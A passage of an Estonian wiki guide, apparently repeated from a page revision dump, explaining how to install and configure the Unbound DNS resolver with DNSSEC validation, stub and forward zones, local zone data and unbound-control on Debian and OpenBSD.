iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

====Tööpõhimõte====

Väited

* private-address ja private-domain kasutamine toimub koostöös
* private-domain loetleb domeenide nimed, mille alla kuuluvad kirjed võivad lahenduda privaatseteks aadressideks
* private-address määratleb, mida peetakse antud kasutusjuhtumil silmas privaatsete aadresside all
* üks unbound protssess saab tegeleda ainult ühe komplekti domeenide ja ühe komplekti privaatsete aadressidega
* vaikimisi ei lahenda unbound as112 hulka kuuluvate dns nimesid (nt 4.3.2.10.in-addr.arpa ptr kirje küsimust)
* local-zone abil saab teha erandeid mainitud as112 nimede lahenduses

local-zone erandi tegemine 168.192.in-addr.arpa jaoks

<pre>
..

local-zone: "168.192.in-addr.arpa" transparent

stub-zone:
name: "168.192.in-addr.arpa"
stub-addr: 10.192.0.53

...
</pre>

dns rebinding protection on vaikimisi välja lülitatud, st private-address ja private-domain väärtused on tühjad, kasutamine toimub nt selliselt

<pre>
private-address:
</pre>

====Misc====

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

t

<pre>
server:
interface: 127.0.0.1
port: 53
do-ip4: yes
do-ip6: no

access-control: 127.0.0.1/32 allow
module-config: "iterator"
verbosity: 1
use-syslog: yes
log-queries: yes

stub-zone:
name: "xxx.ee"
stub-addr: 192.168.1.111

forward-zone:
name: "."
forward-addr: 10.0.9.4
forward-addr: 10.0.9.5
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-17T21:16:57Z

Imre: /* 2026 kevad märkused */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
